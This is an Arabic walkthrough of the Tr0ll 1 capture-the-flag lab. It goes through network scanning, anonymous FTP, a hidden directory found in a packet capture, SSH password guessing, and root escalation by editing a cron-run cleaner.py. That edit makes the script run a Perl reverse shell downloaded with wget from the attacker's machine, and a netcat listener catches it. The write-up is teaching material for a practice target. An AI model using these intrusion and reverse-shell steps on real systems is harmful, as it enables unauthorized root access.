Tr0ll 1
اليوم سوف نطرق الي حل تحدي Tr0ll 1 و عبارة عن تحدي يعتمد علي التسلسل في العمليات حتي تتمكن من اختراق النظام و الحصول علي صلاحيات Root
لتنزيل التحدي من هنا Tr0ll 1
الخطوات
اولا اكتشاف الــIP الخاص بالنظام المصابة
وذلك عن طريق الــNMAP
nmap -Pn 192.168.204.1/24
Pn حيث يقوم هذا الخيار علي عمل Ping scan حتي يحدد الاجهزة المتصلة في الشبكة
كما يظهر في الصورة الـــIP هو 192.168.204.146 ملاحظة بيسطة يوجد جهاز متصل اخر والــIP هو 192.168.204.1 كما هو ظاهر في عالم الشبكات عبارة عن gateway لتاكد من هذا الامر افتح الــcmd و اكتب الامر التالي ipconfig و ستلاحظ نفس الــIP
الان دعنا نعد لـ192.168.204.146
كما في الصورة الخدمات التي تعمل عليه هي Ftp ssh http الان خذ العنوان واذهب الي المتصفح
ممتاز دعنا نبحث اي شئ مفيد في محتوي الصفحة
لا يوجد اي شئ مفيد في المحتوي
اذا بما تفكر ان نذهب الي ssh لايمكن الا ان يكون لديك اسم و كلمة سر للاتصال
جيد ان نذهب الي ftp
جيد افتح الــcmd و اكتب ftp 192.168.204.146
جيد سوف يسالك من كلمة السر كما نعمل المستخدمين في ftp ان المستخدم anonymous يطلق علي الشخصة الذي يتصفح من دون ان تكون له كلمة سر و هو النوع الاكثر شيوعاً في مواقع التنزيل سوف يسالك من كلمة السر اضغط Enter سوف تتصل كما موضح بالصورة التي في الاعلي
الان سوف نقوم بعرض محتويات السيرفر بستخدام الامر dir او ls
كما هو موضح باللون الاحمر هنالك ملف package سوف نقوم بتنزيلة و تصفح محتوي الملف باستخدام برنامج الــwireshark لمعرفة محتوياه
سوف نقوم تنزيل الملف باستخدام الامر get lol.pcap
ممتاز تم تنزيل الملف
الان نقوم بفتح الملف
الان كما هو مبين الان الــpackage تحتوي علي بيانات الان نقوم بعرض المحتوي
ممتاز الان نعمل محتوي الــpackage هو رسالة نلاحظ اسم غريب sup3rs3cr3tdirlol ناخذ الاسم الي المصتفح و نضيفة الي العنوان
رائع الرابط يحتوي علي ملف علينا تنزل الملف عن طريق الامر wget http://192.168.204.146/sup3rs3cr3tdirlol/roflmao
و رؤية محتوى الملف او تنفيذ المف
سوف نقوم بتنفيذ الملف اذا كان يحتوي علي رسالة تقود الي الحل
كما هو معلوم طريقة تنفيذ الملف عند تنفيذ الملف يظهر لينا 0x0856BF وهو عنوان في الذاكرة و لكن ما الفائدة منه تذكر معي العنوان الذي وجد في الـpackage قاد الي هذا الملف سوف ناخذ العنوان و نذهب الي المتصفح
كما توقعنا تمام العنوان قاد الي خطوة اخري
يوجد ملف في المسار good_luck/ الملف يحتوي علي اسماء
جميل الان نذهب الي المسار الثاني /this_folder_contains_the_password كما واضح من الاسم حيث يحتوي علي ملف واحد و هو Pass.txt
جميل الملف يحتوي علي كلمة واحد فقط
الان لدينا الاسماء و كلمة السر بستخدام اي من برامج تخمين كلمات السر لدخول عن طريق SSH
برامج مثل hydra او patator
تذكر دائما اي شئ عبارة عن معلومة مفيد حتي و لو كان اسم ملف بعد تجرب جميع الاسماء مع كلمة السر الموجودة في الملف لاشئ مفيد ماذا لو كانت كلمة السر هي اسم الملف بعد تجريب جميع الاسماء مع اسم ملف كلمة السر تبين ان المستخدم هو overflow الان نتصل عن طريق ssh
ssh overflow@192.168.204.146
كلمة السر هي Pass.txt
بعد الاتصال يتم قطع الاتصال بعد فترة من الزمن كما نعلم ان في نظام التشغيل تكون service تسمى cron الفائدة من هذه service تقوم باجراء العمليات في فترات زمينة ثابت
جميل كما في الصورة حاولنا معرفة محتوي الملف لكن لا نمتلك الصلاحيات الكافية لتمكننا من ذلك
الان لدينا حل واحد هو معرفة ماذا تجري الـــservice يظهر ذلك في الــlog
كما في الصورة حيث وجدنا ان الملف الذي يتم تنفيذه هو cleaner.py
الان الخطوة القادمة هي ايجاد الملف باستخدام الامر find
find / -name 'cleaner.py' 2>/dev/null
الان وجدنا الملف الان علينا رؤية الصلاحيات التي اعطة لملف
كما في الصورة ان الصلاحيات هي صلاحيات root اي شئ يتم تنفيذ عن طريقة هذا الــScript يطبق بصلاحيات root الان ننظر الي محتوي الملف
الــScript يقوم بعملية مسح لمحتوى المسار /tmp الان فكر كيف ناخذ صلاحات مالك هذا الملف وهو الــRoot يمكننا تحميل ملف Backoor او Reverse-shell من اجل الحصول علي هذه الصلاحيات
اولا تنزل الملف و الملف عبارة عن Reverse-shell حيث يوجود في المسار الاتي في توزيعة Kali linux
/usr/share/webshells سوف نختار perl-reverse-shell.pl ونقوم بالتعديل علي الملف و تغير الــIP الي العنوان الخاص بنا و هو 192.168.204.145
و نقوم بتغير الــPort الي اي رقم حتي نقوم بستقبال اتصال عن طريقة
نقوم بنقل الملف الي /var/www/ في نظام الــkali linux و اعادة تسمية الملف حتي يكون سهل في الحفظ من اجل الوقت قمنا بتسمية الملف الي perl.pl و الان نذهب الي تنزل الملف
wget http://192.168.204.145/perl.pl
الان قمنا بتنزل الملف لكن كما نعلم سوف يتم مسح الملف عن طريق الــScript cleaner.py الخطوة القادمة هي السرعة في ادعاء العملية اول تغير متحتوي cleaner.py ثم تنزيل الملف ثم عمل تنصت علي الاتصال
الان قمنا بالتعديل بحيث بقوم بتنفيذ الملف بدل من حذفة الان نقوم بتنزل الملف و اعطاء صلاحية التنفيذ
الان قمنا بتنزيل الملف و اعطاء صلاحية التنفيذ
الان نقوم بعميل استقبال الاتصال عن طريق netcat
انتظار استقبال الاتصال
و عمل تاكد من الصلاحية من خلال whoami